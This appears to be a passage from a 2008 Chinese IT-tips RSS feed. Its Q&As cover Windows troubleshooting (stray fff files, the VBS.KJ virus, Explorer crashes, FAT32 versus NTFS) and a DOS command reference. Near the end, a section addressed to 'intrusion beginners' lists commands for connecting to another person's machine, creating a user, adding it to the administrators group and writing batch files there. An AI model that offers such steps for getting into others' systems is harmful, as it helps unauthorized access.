<P><FONT face=Verdana>　　但只要系统中有Mdm.exe存在，那么以fff开头的怪文件就又有可能产生。你可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件：首先按“Ctrl+Alt+Del”组合键，在弹出的“关闭程序”窗口中选中“Mdm”，按“结束任务”按钮来停止Mdm.exe在后台的运行，接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序，在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动，然后点击“确定”按钮，结束msconfig程序，并重新启动电脑。另外，如果你使用IE 5.X，建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”)，这样就可以避免以fff开头的怪文件再次产生。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[FOLDER.HTT等文件的问题]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2547</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:34:11</pubDate>
<description><![CDATA[<P><FONT face=Verdana>folder.htt等文件的问题</FONT></P>
<P><FONT face=Verdana>Q12.2：最近在我的电脑的所有文件夹中出现了这样两个文件esktop.ini、folder.htt，怎么也删不去。有人说是病毒，把系统和别的分区全格式化了就好了。可是我的东西全都有用，不能格式化的，请问怎么办？</FONT></P>
<P><FONT face=Verdana>　　A：你的电脑可能是感染了VBS.KJ脚本病毒。该病毒采用VBScript语言编写，在互联网上通过电子邮件进行传播，也可以通过文件感染；感染后的机器系统资源被大量消耗，速度变慢；利用Windows系统的“资源管理器”进行寄生与感染。在每个检查到的文件夹下生成desktop.ini和folder.htt文件(隐藏属性)。并且，该病毒还会修改注册表的许多键值。手工删除比较困难，建议采用杀毒软件杀毒，这样可以避免格式化你的硬盘，保护你的数据。金山公司反病毒应急处理中心的《新欢乐时光》专杀工具效果比较好，并提供免费下载，下载链接ftp://www.iduba.net/download/othertools/scanvbskj.exe大小仅56KB！</FONT></P>
<P><FONT face=Verdana></FONT> </P>]]></description>
</item>

<item>
<title><![CDATA[FAT32与NTFS磁盘格式]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2546</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:33:44</pubDate>
<description><![CDATA[<P><FONT face=Verdana>如何合理使用FAT32与NTFS磁盘分区格式</FONT></P><FONT face=Verdana>
<P><BR>问：</P>
<P>磁盘有FAT32和NTFS两种格式<BR>那个好一点！<BR>怎么互相转化啊？</P>
<P> </P>
<P><BR>答：</P>
<P>FAT32 ：DOS兼容性不错，如果经常进行GHOST和各种DOS操作，建议使用FAT32。</P>
<P>             实际测试后，发现分区容量在8G以下，FAT32比NTFS高效率。</P>
<P>NTFS：高安全性，产生文件碎片的几率小……。</P>
<P>            18G以上的分区，使用NTFS则效率较高。</P>
<P>怎么互相转化：使用光盘中的PQ8.02，转换过程不损坏文件。</P>
<P>                     使用这张光盘安装完系统，第一次进系统会询问要不要转换成NTFS。</P>
<P>建议：C盘分为8G，使用FAT32，方便GHOST和DOS操作。其它分区为NTFS。</P>
<P>         最后一个分区建议为FAT32，5G以上，存放备份后的GHO文件。</P>
<P>PS：FAT32和NTFS实际上不是一种磁盘格式，而是文件管理系统。</P>
<P></FONT> </P>]]></description>
</item>

<item>
<title><![CDATA[EXPLORER没有响应的解决方法]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2545</link>
<author>IT梦工场</author>
<pubDate>2008-8-25 12:33:18</pubDate>
<description><![CDATA[<P><FONT face=Verdana>下面是可能的几种EXPLORER.EXE出错的情况 </FONT></P><FONT face=Verdana>
<P><BR>1. 软件问题（特别是右键第三方加载项） <BR>安装清华紫光输入法3.0版本有的时候会出现explorer.exe出错，取消清华紫光输入法，用其他输入法输法如果没有问题，可以判断为输入法问题。卸载清华紫光输入法，即可解决。 <BR>清华紫光输入法4.0版本未发现类似问题。 <BR>苹果美化版的rar惹的祸，把它卸载了暂时就没有这个错误了，你也可以看是不是安装了苹果美化版的rar，有的话，也可以卸载了来看一下,装了酒精120%或者酒精52%虚拟光驱，在的系统中很容易出现explorer.exe错误。卸载有时候会解决问题 </P>
<P>2. explorer.exe程序本身的原因 <BR>检查explorer.exe的文件大小，正常情况下应该显示为237k或者238k，如果大小不一致，可以从别的机器上拷贝一个explorer.exe文件到本机，调用任务管理器，接入explorer.exe进程，然后新建任务拷贝新的文件到系统盘\WINNT目录下。 </P>
<P>3. 可能为病毒原因（wc98pp.dll）<BR>（我的就是中了木马捆绑病毒，它捆绑explorer.exe运行，所以当登陆的时候就没响应，用流行病毒专杀工具Spant.EXE可以杀掉，或装诺顿也可以杀。）<BR>网络协议处理器 - 电子书编译工具Web Compiler相关。 <BR>wc98pp.dll文件本身并没有影响，很多计算机上都有此文件，但是当explorer.exe出错的时候，删除此文件可以解决问题，然后从注册表中搜索相关键值删除。 <BR>usign.dll，有人提到这个文件与wc98pp.dll两个文件类似，删除这两个文件可以清除IE中不断跳出小广告。在公司的计算机中未发现此文件。 </P>
<P>4. 其他原因 <BR>计算机运行某个程序等待时间过长，比如读取数据，尤其是光盘或者外界设备的数据的时候，也会出现explorer.exe出错，提示与上面的情况相同。 </P>
<P>5. 系统内核错误 <BR>此类情况我暂时无法解决，重新安装系统。 </P>
<P>6.内存问题 <BR>有人通过更换内存,解决了这个问题,所以这应该是个原因,不过如果这个出问题就比较麻烦了,所以先考虑前面几个原因 </P>
<P>7.windows升级造成的 <BR>大家都知道我们用的是盗版xp,既然是盗版的,肯定会出现各种各样的错误.微软也不是sb,肯定会搞一些问题来惩罚我们,所以建议大家不要上网自动更新,并且把自动更新关掉(实际上这个更新没p用) </P>
<P>下面是从网上搜索到的一些关于此烦人错误的资料及解决方法 </P>
<P>1.第三方加载项的问题 <BR>我以一般的途径从遇到explorer错误的人们得到信息。通常他们都这么叙述:" 当我在资源管理器中右键点击一个文件时系统提示explorer遇到错误需要关闭"或"当我尝试浏览文件夹的时候,我收到系统提示 xplorer遇到错误需要关闭" 。 通常，这些错误是由于第三方加载项没有正常工作所引起的 这些加载项负责创建一些选项当你在资源管理器右键点击一个文件时。一些第三方程序会添加他们自己的选项到这些菜单，而这有些时候会出现问题 如果你仔细看下面的图片，你会发现几个非常规的选项在这个右键菜单上： "Send to Fax Recipient"，"Scan with Norton Antivirus", "TextPad" 和 "Winzip"。 <BR>如果想尝试寻找引起explorer错误的第三方加载项，你需要下载这个工具：ShellExView，它会允许你查 <BR>看和禁用加载项 解决办法：当你下载并运行它以后，ShellExView会显示出所有的安装在你的电脑上的加载项。你可以分类排序使所有第三方加载项示在一起。然后，选择所有第三方加载项并禁用它们，并试着执行以前导致错误的操作（比如右键点击一个文件或浏览一个文件夹等等）如果没有错误提示，就说明你所禁用的一个加 <BR>载项造成了explorer错误。接下来，通过每一次启用一个加载项并尝试之前引起错误的操作就可以找出引起错误的第三方扩展了ShellExView会显示出加载项的所有的额外信息, 比如版本号、公司名称。如果你希望继续使用致使 <BR>explorer出错的加载项，请检查他的更新版本或联系他的客户支持 <BR>explorer出错的另一个原因是因为机器里内含病毒、木马或间谍广告程序。想检测电脑里存在的病毒请使 <BR>用专业的程序，比如江民、瑞星等杀毒软件；检测电脑里存在的间谍软件，我推荐下列程序：Microsoft </P>
<P>Windows AntiSpyware (Beta)、Lavasoft's Ad-Aware、Rose City Software's Spyware Medic或者Spybot's Search & Distroy。 <BR>ShellExView这个软件在附件里面有提供. </P>
<P>2.一些关于此问题的中文知识库文章 <BR>在“地址”框或“打开”框中键入地址时出现错误消息 桌面是白色的并且错误信息报告 Browseui.dll 中有“Windows 资源管理器”错误 <BR>错误信息：Explorer Caused an Invalid Page Fault in Module Browseui.dll（资源管理器导致模块 </P>
<P>Browseui.dll 中出现无效页面错误） </P>
<P>错误信息：Error Loading Explorer.exe You Must Reinstall Windows（加载 Explorer.exe 时出现错误，必须重新安装 Windows) </P>
<P>查看“我的电脑”中的内容时 Windows 资源管理器退出 </P>
<P>在试图映射网络驱动器时 Windows 资源管理器退出并生成错误信息 </P>
<P>尝试安装 Windows 2000 Service Pack 3 时出现错误信息“Explorer.exe Has Generated Errors and </P>
<P>Will Be Closed By Windows”（Explorer.exe 发生错误，将被 Windows 关闭） </P>
<P>在关闭某个文件夹时，Explorer.exe 可能会生成一个应用程序错误 </P>
<P>尝试打开“网上邻居”时收到“Windows Explorer Has Encountered a Problem and Needs to Close” <BR>（Explorer.exe 发生错误，将被 Windows 关闭）错误消息 </P>
<P>右键单击文件时出现错误信息，或是当在 Autodesk 或 Discreet 产品中打开某些文件时发生问题 </P>
<P>在 Windows XP 中试图打开“网上邻居”或“共享文档”时，“我的电脑”和 Windows 资源管理器意外退出 </P>
<P>Explorer.exe 在 Windows XP 中反复意外退出 </P>
<P>3.怎样避免 </P>
<P>使用Windows XP时间比较长后，有时运行会很不流畅，甚至会不响应鼠标键盘对操作。很多时候是系统的假死。和真正的死机不同，假死完全可以被“救活”。假死的根源在于explorer.exe(整个图形界面的驱动)。既然会假死，那就一定有解决方法，下面就为朋友们介绍一些拯救系统假死的方法。 <BR>第一招:当使用资源管理器打开新文件夹或用浏览器打开新页面不响应时，用“Win+D”或单击快速启动栏的显示桌面按钮，再在桌面上按F5或右键刷新即可。一般刷新3-5次后再把资源管理器或浏览器窗口还原就会恢复正常了。 <BR>第二招:这一招很灵，能对付大多数假死的情况。当任务管理器都打不开时，先把光驱弹出之后再弹入(千万不要在光驱里放光盘)，鼠标指针旁会出现一个小光盘标志，这时就会唤起系统的知觉，这招可是屡试不爽! <BR>第三招:最后的杀手锏，用组合键“Ctrl+Alt+Del”启动任务管理器，然后在“进程”选项卡中结束explorer.exe，整个桌面只剩一张壁纸，桌面图标和任务栏都没影了，然后在任务管理器的“文件→新建 </P>
<P>任务”中输入explorer.exe，即可恢复正常。这一招还可释放内存资源，一举两得。 <BR>照下面的方法可以明显减少假死可能性: <BR>能不用右键菜单的时候就尽量不用，尽量使用热键如用F2重命名、用F5刷新等。Windows Media </P>
<P>Player最好不用可视化效果，用了往往会卡机。真想用的话，微粒是最不容易卡机的，建议用“微粒”可视化效果。不要轻易使用内存整理软件，往往会越整理系统速度越慢。如果真想释放系统资源，注销当前 </P>
<P>用户再重新登录是最好的方式。说了这么多，大家也不妨试试这些方法。 </P>
<P>4.有人提出的一个方法 <BR>关于EXPLORER.EXE出错解决方法，大家试试 <BR>把如下内容做成批处理文件，执行一下。explorer的问题基本上可以解决。 </P>
<P>del c:\winnt\wc98pp.dll del c:\windows\wc98pp.dll <BR>regsvr32 actxprxy.dll /s <BR>regsvr32 shdocvw.dll /s <BR>regsvr32 mshtml.dll /s <BR>regsvr32 urlmon.dll /s <BR>regsvr32 msjava.dll /s <BR>regsvr32 browseui.dll /s <BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[EXPLORER的作用]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2544</link>
<author>IT梦工场</author>
<pubDate>2008-8-24 22:57:27</pubDate>
<description><![CDATA[<P><FONT face=Verdana>Explorer.exe程序在系统中的作用</FONT></P>
<P><FONT face=Verdana>凡是Windows系列的操作系统，运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏，它在不同的系统中有不同的妙用。</FONT></P>
<P><FONT face=Verdana>　　Windows 9x中的应用</FONT></P>
<P><FONT face=Verdana>　　在Windows 9x中，这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程，系统就会刷新桌面，并更新注册表。所以，我们也可以利用此方法来快速更新注册表。方法如下：</FONT></P>
<P><FONT face=Verdana>　　按下Ctrl+Alt+Del组合键，出现“结束任务”对话框。在该对话框中选择“Explorer”选项，然后单击“结束任务”按钮，将出现“关闭Windows”对话框。单击“否”按钮，系统过一会儿将出现另一个对话框，告诉你该程序没有响应，询问是否结束任务。单击“结束任务”按钮，则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了？</FONT></P>
<P><FONT face=Verdana>　　Windows 2000/XP中的应用</FONT></P>
<P><FONT face=Verdana>在Windows 2000/XP和其他Windows NT内核的系统中，Explorer.exe进程并不是系统运行时所必需的，所以可以用任务管理器来结束它，并不影响系统的正常工作。打开你需要运行的程序，如记事本。然后右击任务栏，选择“任务管理器”，选中“进程”选项卡，在窗口中选择Explorer.exe进程，单击“结束进程”按钮，，接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外)，所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。</FONT></P>
<P><FONT face=Verdana>如果你想运行其他软件，但此时桌面上空无一物，怎么办？别着急，下面有两种可以巧妙地打开其他软件：</FONT></P>
<P><FONT face=Verdana>　　第一种方法：按下Ctrl+Alt+Del组合键，出现“Windows安全”对话框，单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键)，在任务管理器窗口中选中“应用程序”选项卡，单击“新任务”，在弹出的“创建新任务”的对话框中，输入你想要打开的软件的路径和名称即可。</FONT></P>
<P><FONT face=Verdana>　　你还可以在正在运行的软件上，选择“文件→打开”，在“打开”对话框中，点击“文件类型”下拉列表，选择“所有文件”，再浏览到你想打开的软件，右击它，在快捷菜单中选择“打开”命令，就可以启动你需要的软件了。注意，此时不能够通过单击“打开”按钮来打开软件，此种方法适用于大多数软件，Office系列除外。<BR>通过结束Explorer.exe进程，还可以减少4520KB左右的系统已使用内存，无疑会加快系统的运行速度，为资源紧张的用户腾出了宝贵的空间。</FONT></P>
<P><FONT face=Verdana>　　提示：重新启动Explorer.exe进程后，有些软件在任务栏系统托盘的小图标会消息，但该软件还是在正常运行当中。如果觉得有些不方便，可以再次打开该软件来显示小图标。<BR></FONT></P>]]></description>
</item>

<item>
<title><![CDATA[DOS中使用系统还原工具]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2543</link>
<author>IT梦工场</author>
<pubDate>2008-8-24 22:56:57</pubDate>
<description><![CDATA[<FONT face=Verdana>在DOS中使用系统还原工具   <BR>  <BR>　　在系统上电自检声响后，Windows欢迎屏幕出现之前按下F8键，接着在菜单中选择Safe Mode with Command Prompt，然后使用管理员身份登录，在命令行提示符后输入：%systemroot%\ system32\restore\rstrui.exe，回车后跟随屏幕上的向导将系统恢复到以前的正常状态。<BR> <BR></FONT>]]></description>
</item>

<item>
<title><![CDATA[DOS如何安装TCP-IP协议]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2542</link>
<author>IT梦工场</author>
<pubDate>2008-8-24 22:56:34</pubDate>
<description><![CDATA[<P><FONT face=Verdana>DOS如何安装tcp/ip协议，用来运行FTP,TELNET等</FONT></P>
<P><FONT face=Verdana>有安装盘，运行setup.exe or install.bat<BR>文件解压缩后，在硬盘上生成一个目录，如 C:\tcpip<BR>运行FTP，TELNET必须首先运行网卡的驱动程序，然后<BR>就可以了。例如NE2000的网卡：<BR>C:\TCPIP>type tcp.bat</FONT></P>
<P><FONT face=Verdana>C:\TCPIP\NE2000 0x62 0x03 0x300<BR>C:\TCPIP\TCPSTART</FONT></P>
<P><FONT face=Verdana>然后，运行telnet 或 ftp 都可以咯。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[DOS命令]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2541</link>
<author>IT梦工场</author>
<pubDate>2008-8-24 22:56:04</pubDate>
<description><![CDATA[<P><FONT face=Verdana>DOS：disk operate system,磁盘操作系统，DOS命令又分内部命令和外部命令。内部命令又称为驻机命令，它是随着DOS系统的启动同时被加载到内存里且长驻内存。也就是说，只要启动了DOS系统，我们就可以使用内部命令。外部命令是储存在磁盘上的可执行文件，执行这些外部命令需要从磁盘将其文件调入内存，因此，外部命令只有该文件存在时才能使用。带有.COM、.EXE、.BAT等扩展名的文件都可看成是外部命令。<BR>常用的内部命令有MD、CD、RD、DIR、PATH、COPY、TYPE、EDIT、REN、DEL、CLS、VER、DATE、TIME、PROMPT。<BR>常用的外部命令有DELTREE、FORMAT、DISKCOPY、LABEL、VOL、SYS、XCOPY、FC、ATTRIB、MEM、TREE。<BR>常用的内部命令详解</FONT></P>
<P><FONT face=Verdana>1．MD——建立子目录 <BR>功能：创建新的子目录ü<BR>类型：内部命令ü<BR>格式：MD[盘符：][路径名]〈子目录名〉ü<BR>FOR 1：<BR>C:\>md y    /*---建立y子目录---*/</FONT></P>
<P><FONT face=Verdana>2．CD——改变当前目录<BR>功能：显示当前目录ü<BR>类型：内部命令ü<BR>ü 格式：CD[盘符：][路径名][子目录名]<BR>说明：CD命令不能改变当前所在的盘，CD..退回到上一级目录，CD\表示返回到当前盘的目录下，CD无参数时显示当前目录名。<BR>FOR 2：<BR>C:\>cd y   /*---显示当前目录y---*/</FONT></P>
<P><FONT face=Verdana>3．RD——删除子目录命令<BR>ü 功能：从指定的磁盘删除了目录。<BR>类型：内部命令ü<BR>格式：RD[盘符：][路径名][子目录名]ü<BR>FOR 3：<BR>C:\>rd y</FONT></P>
<P><FONT face=Verdana>4．DIR——显示磁盘目录命令<BR>功能：显示磁盘目录的内容。ü<BR>类型：内部命令ü<BR>格式：DIRü [盘符][路径][/P][/W]<BR>FOR 4：<BR>C:\>dir y</FONT></P>
<P><FONT face=Verdana>5．PATH——路径设置命令<BR>ü 功能：设备可执行文件的搜索路径，只对文件有效。<BR>类型：内部命令ü<BR>ü 格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}<BR>FOR 5：<BR>C:\>path<BR>PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\PROGRAMFILES\MTS</FONT></P>
<P><FONT face=Verdana>6．COPY文件复制命令<BR>ü 功能：拷贝一个或多个文件到指定盘上。<BR>类型：内部命令ü<BR>格式：COPYü [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]<BR>FOR 6_1：<BR>C:\>copy yyy.txt yyy<BR>        1 file(s) copied<BR>C:\yyy>dir yyy<BR>YYY      TXT     8  11-23-03  19:21    /*---现在用DIR命令查看复制的情况---*/<BR>说明： 如果是将多个文件复制到一个新的文件，命令是这样的COPY [源盘][路径]〈源文件A〉+[源盘][路径]〈源文件B〉[目标盘][路径][目标文件名]<BR>FOR 6_2：<BR>C:\>copy x.txt+y.txt xy.t<BR>x.txt<BR>y.txt<BR>        1 file(s) copied</FONT></P>
<P><FONT face=Verdana>7．TYPE——显示文件内容命令<BR>功能：显示ASCII码文件的内容。ü<BR>类型：内部命令。ü<BR>ü 格式：TYPE[盘符：][路径]〈文件名〉<BR>FOR 7：<BR>C:\>trpe yyy.txt   /*---假设C盘目录下存在yyy.txt文件---*/</FONT></P>
<P><FONT face=Verdana>8．EDIT——编辑文件内容命令<BR>1.功能：编辑ASCII文件的内容，也可建立一个新文件。<BR>2.类型：内部命令。<BR>3. EDIT[盘符：][路径]〈文件名〉<BR>说明： EDIT即可以编辑ASCII文件的内容，也可以新建立一个文件，他们的扩展名命名方式也很灵活，比如.txt、.bat,甚至可以编辑.c、.bas的格式。<BR>FOR 8_1：<BR>C:\>edit   /*进入编辑模式*/<BR>FOR 8_2：<BR>C:\>edit yyy.txt  /*---编辑yyy.txt文件的内容，如果要选择支持中文格式，应该安装UCDOS---*/</FONT></P>
<P><FONT face=Verdana>9．REN——文件改名命令<BR>ü 功能：更改文件名称<BR>类型：内部命令ü<BR>格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉ü<BR>FOR 9：<BR>C:\>ren yyy.txt cly.txt</FONT></P>
<P><FONT face=Verdana>10．DEL——删除文件命令<BR>功能：删除指定的文件。ü<BR>类型：内部命令ü<BR>ü 格式：DEL[盘符：][路径]〈文件名〉[/P]<BR>说明：选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除。</FONT></P>
<P><FONT face=Verdana>11．CLS——清屏幕命令<BR>ü 功能：清除屏幕上的所有显示，光标置于屏幕左上角。<BR>类型：内部命令ü<BR>格式：CLSü<BR>FOR 11：<BR>C:\>CLS</FONT></P>
<P><FONT face=Verdana>12．VER查看系统版本号命令<BR>功能：显示当前系统版本号ü<BR>类型：内部命令ü<BR>ü 格式：VER<BR>FOR 12：<BR>C:\>VER<BR>Windows 98 [Version 4.10.2222]   /*---当前系统的版本号---*/</FONT></P>
<P><FONT face=Verdana>13．DATA日期设置命令<BR>功能：设置或显示系统日期。ü<BR>类型：内部命令ü<BR>ü 格式：DATE[mm—dd—yy]<BR>FOR 13：<BR>C:\>DATE<BR>Current date is Sun 11-23-2<BR>Enter new date (mm-dd-yy):   /*---提示你输入新的日期---*/</FONT></P>
<P><FONT face=Verdana>14．TIME系统时钟设置命令<BR>功能：设置或显示系统时期。ü<BR>类型：内部命令ü<BR>ü 格式：TIME[hh：mm：ss：xx]<BR>FOR 14：<BR>C:\>time<BR>Current time is  22:49:28.81<BR>Enter new time:</FONT></P>
<P><FONT face=Verdana>15．PROMPT：更改命令提示符<BR>ü 功能：改变DOS系统提示符的风格。<BR>类型：内部命令ü<BR>格式：PROMPT [text]ü<BR>说明：text 指定新的命令提示符，提示符可以由普通字符及下列特定代码组成，<BR>$A & (Ampersand)<BR>$B | (管道)<BR>$C ( (左括弧)<BR>$D 当前日期<BR>$E Escape 码(ASCII 码 27)<BR>$F ) (右括弧)<BR>$G > (大于符号)<BR>$H 后退(擦除前一个字符)<BR>$L < (小于符号)<BR>$N 当前驱动器<BR>$P 当前驱动器及路径<BR>$Q = (等号)<BR>$S (空格)<BR>$T 当前时间<BR>$V Windows 2000 版本号<BR>$_ 换行<BR>$$ $ (货币符号)<BR>FOR 15：<BR>C:\>prompt<BR>C></FONT></P><FONT face=Verdana>
<P><BR>常用的外部命令详解<BR>1．DELTREE——删除整个目录命令<BR>ü 功能：将整个目录及其下属子目录和文件删除。<BR>类型：外部命令ü<BR>格式：DELTREE[盘符：]〈路径名〉ü<BR>FOR 1：<BR>C:\>deltree yyy<BR>Delete directory "yyy" and all its subdirectories? [yn]</P>
<P>2． FORMAT——磁盘格式化命令<BR>ü 功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。<BR>ü 类型：外部命令<BR>格式：FORMAT〈盘符：〉[/Q][/S][/AUTOTEST]ü<BR>FOR 2.：<BR>C:\>format d:/q/s/autotes<BR>Checking existing disk fo</P>
<P>3． DISKCOPY——整盘复制命令<BR>ü 功能：复制格式和内容完全相同的软盘。<BR>类型：外部命令ü<BR>格式：DISKCOPY[盘符1：][盘符2：]ü<BR>FOR 3：<BR>C:\>diskcopy a: b:  /*---这里的源盘是A盘，目标盘为B盘---*/</P>
<P><BR>4． LABEL——建立磁盘卷标命令<BR>功能：建立、更改、删除磁盘卷标。ü<BR>类型：外部命令ü<BR>ü 格式：LABEL[盘符：][卷标名]<BR>FOR 4：<BR>C:\>label c: yyy    /*---将C盘的卷标更改为YYY---*/</P>
<P>5．VOL——显示磁盘卷标命令<BR>功能：查看磁盘卷标号。ü<BR>类型：内部命令ü<BR>ü 格式：VOL[盘符：]<BR>FOR 5：<BR>C:\>vol c:<BR>Volume in drive C is YYY<BR>Volume Serial Number is C406-9364</P>
<P>6．SYS——系统复制命令<BR>ü 功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。<BR>类型：外部命令ü<BR>ü 格式：SYS[盘符：]<BR>*说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.<BR>FOR 6：<BR>C:\>sys d:<BR>System transferred  /*---系统文件已经转移到D盘---*/<BR>7．XCOPY——目录复制命令<BR>ü 功能：复制指定的目录和目录下的所有文件连同目录结构。<BR>类型：外部命令ü<BR>格式：XCOPYü [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]<BR>说明：XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。<BR>FOR 7：<BR>C:\>xcopy yyy d:<BR>yyy.txt<BR>        1 File(s) copied</P>
<P>8．FC——文件比较命令<BR>功能：比较文件的异同，并列出差异处。ü<BR>类型：外部命令ü<BR>ü 格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/b][/C][/N]<BR>说明：选用/A参数，为ASCII码比较模式；选用/B参数，为二进制比较模式；选用/C参数，将大小写字符看成是相同的字符；选用/N参数，在ASCII码比较方式下，显示相异处的行号。<BR>FOR 8：<BR>C:\>fc yyy.txt cly.txt<BR>Comparing files yyy.txt and cly.txt<BR>****** yyy.txt<BR>oeekjeheqwkf<BR>****** cly.txt<BR>1111<BR>******</P>
<P>9．ATTRIB——修改文件属性命令<BR>功能：修改指定文件的属性。ü<BR>ü 类型：外部命令。<BR>ü 格式：ATTRIB[文件名][R][—R][A][—A][H][—H][S][—S][/S]<BR>说明：选用R参数，将指定文件设为只读属性，使得该文件只能读取而无法写入数据或删除，选用——R参数，去除只读属性；A参数为档案属性；H参数为隐含属性；S参数为系统属性。<BR>FOR 9：<BR>C:\>attrib yyy.txt +h +r    /*---将记事本文件设置为隐藏、只读属性---*/<BR>C:\>attrib yyy.txt -h –r    /*---将记事本文件去掉隐藏、只读属性---*/</P>
<P>10．MEM——查看当前内存状况命令<BR>ü 功能：显示当前内存使用的情况<BR>类型：外部命令ü<BR>ü 格式：MEM[/C][/F][/M][/P]<BR>说明：选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；选用/M参数显示该模块使用内存地地址、大小及模块性质；选用/P参数指定当输出超过一屏时，暂停供用户查看。<BR>FOR 10：<BR>C:\>mem</P>
<P>11．TREE——显示磁盘的目录结构 <BR>功能：显示指定磁盘或路径的目录结构。ü<BR>ü 类型：外部命令。<BR>格式ü [盘符][路径]TREE[盘符][路径][/F]<BR>说明：命令格式中的前一个盘符与路径是用来说明tree.com文件所在的盘与目录；第二个盘符与路径是用来说明需要显示目录结构的磁盘与目录；参数/F除显示目录结构外，还显示各级目录中的所有文件。若省略此参数，仅仅显示目录结构；当目录结构较长且一屏显示不下时，可用命令TREE|MORE分屏显示。<BR>FOR 11：<BR>C:\>tree    /*---因为是tree是外部命令，所有tree.com文件是一定要存在的，否则无法正常使用---*/<BR>操作实例：<BR>①在C盘下新建两个目录X和Y，②进入X目录下新建一个x..bat文件,③再在Y目录下新建y.txt文件，④将x..bat和y.txt文件合并一个新文件xy.bat并保存在D盘，⑤将xy.bat重命名为xy.txt,并查看文件里面的具体内容，⑥在文件里面加入自己的x+y=z并保存，⑦将xy.txt文件属性设置为只读和隐藏。<BR>操作过程：<BR>C:\>md x<BR>C:\>md y<BR>C:\>cd x<BR>C:\x>edit<BR>C:\x>cdC:\>cd y<BR>C:\y>edit<BR>C:\>copy c:\x\x.bat+c:\y\y.txt d:\xy.bat<BR>c:\x\x.bat<BR>c:\y\y.txt<BR>        1 file(s) copied</P>
<P>C:\>ren d:\xy.bat xy.txt<BR>C:\>type d:\xy.txt<BR>C:\>edit d:\xy.txt<BR>C:\>attrib +r +h d:\xy.txt</P>
<P> </P>
<P><BR>常用网络DOS命令，入侵初学的朋友看好了hoho~！</P>
<P>fport                              查看系统端口和端口上运行的程序</P>
<P>netstat -an                        查看所有连接本机IP</P>
<P>ipconfig /all                      查看所有连接本机IP</P>
<P>telnet IP 端口                     连接对方机器某个端口</P>
<P>net user                           查看本机用户<BR>net user 用户名 密码 /add          建立一个用户<BR>net user 用户名 /del               删除一个用户</P>
<P>net localgroup administrators 用户名 /add   把用户添加到管理员       <BR>net localgroup administrators 用户名 /del   把用户从管理员组删除</P>
<P> </P>
<P>啊，好累啊，好像就这么多啦。。。。<BR>哦，对了，好像还没交怎样在对方机器DOS窗口下建立批处理文件</P>
<P>copy con 文件名.bat</P>
<P>………………</P>
<P>………………</P>
<P>（省略号代表命令）</P>
<P>CTRL+Z 存盘退出</P>
<P>这样一个bat文件也就做好了。</P>
<P>对了，还有个是mint教的echo命令，这个命令不仅能建bat，还可以建txt</P>
<P>命令如下</P>
<P>echo dir c:\ >2.bat<BR>echo dir d:\ >>2.bat</P>
<P> </P>
<P>今天先讲这么多把，有不明白的大家加QQ。</FONT></P>]]></description>
</item>

<item>
<title><![CDATA[CS服务器]]></title>
<link>http://itcourse.org.cn/ArticleContent.asp?ID=2540</link>
<author>IT梦工场</author>
<pubDate>2008-8-24 22:55:24</pubDate>
<description><![CDATA[<P><FONT face=Verdana>服务器端的设置：</FONT></P>
<P><FONT face=Verdana>　　第一种方法需要安装HLserver4108下载地址http://download